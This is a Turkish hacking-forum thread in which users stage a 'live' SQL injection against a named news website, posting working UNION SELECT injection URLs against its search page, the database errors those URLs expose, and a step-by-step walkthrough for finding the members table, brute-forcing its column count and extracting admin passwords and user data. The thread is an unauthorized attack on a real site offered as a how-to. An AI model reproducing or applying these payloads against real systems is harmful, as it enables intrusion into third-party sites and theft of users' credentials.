Canlı Canlı Sql İnj Burdan Takip Edin
-
Arkadaşlar Canlı Canlı Siteye sql inj. yapıyorum.Buradan takip edebilirsiniz..
hedef site: www.efestenhaberler.com
arama kısmına ' yazıp arattım sallama bişiler geldi
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00+union+select+0+from+uyeler
table adımız doğru şimdi 1,2,3, vs die gidicez bakalım
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+uyeler
böyle sallama bişi çıktı nolduunu anlamadım geçiyoruz
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00%20UNION%20SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20Uyeler
oha aq bu da ne;
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/ara.asp, line 69
şimdilik burdayım devam edicem sizde görüş bildirebilirsiniz. -
ben yapamıyom bu injectionu yaa :(
http://www.efestenhaberler.com/ara.asp?&yil=00%20UNION%20SELECT%201,2,3,4,5%20from%20uyeler
:S -
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00 dan sonra hemen + olarak sql yazılacak
örn;
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00+[SQL] -
Arkadaşlar çok önemli gerçekten yardım edin acil bi hack yapmam lazım da.Şimdi hani
+union+select+0+from+uyeler yapıoruz ya,
uyeler yerine neler yazılabilir members falan tüm liste için yardım bekliyorum.Lütfen -
bu ne isdir ya ne yapiliyor bu yöntemle biraz aciklayin arkadaslar.
Hangi Forumlara veya portallara bu yöntem ile ne yapmak mümkün -
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00+[bu kısıma bildiğiniz SQL kodarını yazıcaksınız] eğer yerse admin pasını ve diğer kullanıcı bilgilerini elde etmenize yarayan bir kodlama hatasıdır ...
-
Hmmm...Güzel saldiri :=)
Evet site SQL injection yiyor. Az bi baktım. Yapacağın şey basit..Normal Union Select ile yapabilirsin Sanırım.
İlk aradığın zaman verilen hata da bayağı işine yarayacak şeyler var mesela.
Arama kısmına veya herhangi bir linkte ' karakterini koyduğunda bayağı bilgi veriyor. O zaman hemen işe koyul
hata :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'onay=1 and (tur=1 OR tur=3) and haber.e_kad = kategori.e_kad and ((kisa_haber) like '%'%' or (kisa_haber) like '%'%' or (baslik) like '%'%' or (editor) like '%'%' or (haber) like '%'%' or (tarih) like '%'%')'.
/ara.asp, line 69
Bize zaten bir kaç tablo adını verdi ... Haber gibi
Bulduğun linkin ardına devam et... Union Select 0 from uyeler yaz enterla
Açıklama : union select 0 from uyeler 'in anlamı bana uyeler tablosunda 0.cı kolonu getir diorsn...
Sonra sana şole bi hata geliyor.
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/ara.asp, line 69
Burda verilen hatanın anlamı Şudur...
Evet tabloyu buldun şimdi de kolon sayısını bul...
Kolon sayısını da brute mantığı ile tek tek deniyorsun...
yane şole oluyor union select 0,1 from uyeler
her seferinde 1 kolon arttırıyorsun.. Ben Denedim uyeler tablosunda 12 kolon var... yani linki bole yapıorsn...
http://www.efestenhaberler.com/ara.asp?ko=0&k=0&yo=1&d=hid&e=desc&ay=00&yil=00%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0%20from%20uyeler
ve site açılıor...Şimdi tablo ve kolon sayısını bulduk ... Sırada tabloların adlarını bulmakda...
tablo adlarını da benden beklemiyorsun herhalde :D Onları da sen bul artık benim uykum var hade iyi gejeler.
RMx
Toplam Hit: 13131 Toplam Mesaj: 7